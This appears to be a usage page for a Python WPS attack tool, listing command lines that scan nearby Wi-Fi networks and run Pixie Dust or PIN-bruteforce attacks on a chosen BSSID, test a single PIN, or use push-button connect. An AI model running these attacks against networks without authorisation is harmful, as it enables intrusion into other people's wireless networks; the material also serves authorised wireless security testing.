Sections
cd ..
Examples
Basic Attacks
Start hereScan nearby networks, pick a target, and attack. The simplest entry point.
Scan + Pixie Dust
Scans all nearby WPS networks, lets you pick one, runs Pixie Dust automatically.
$
sudo python main.py -i wlan0 -KScan + Bruteforce
Same scan flow but uses bruteforce attack instead.
$
sudo python main.py -i wlan0 -BDirect Pixie Dust
Skip scanning — run Pixie Dust directly on a known BSSID.
$
sudo python main.py -i wlan0 -b AA:BB:CC:DD:EE:FF -KDirect Bruteforce
Skip scanning — run bruteforce directly on a known BSSID.
$
sudo python main.py -i wlan0 -b AA:BB:CC:DD:EE:FF -BManual PIN Test
Try a single specific WPS PIN without any automated attack.
$
sudo python main.py -i wlan0 -b AA:BB:CC:DD:EE:FF -p 12345670Push Button Connect
Authenticate via the physical WPS button on the router.
$
sudo python main.py -i wlan0 --pbc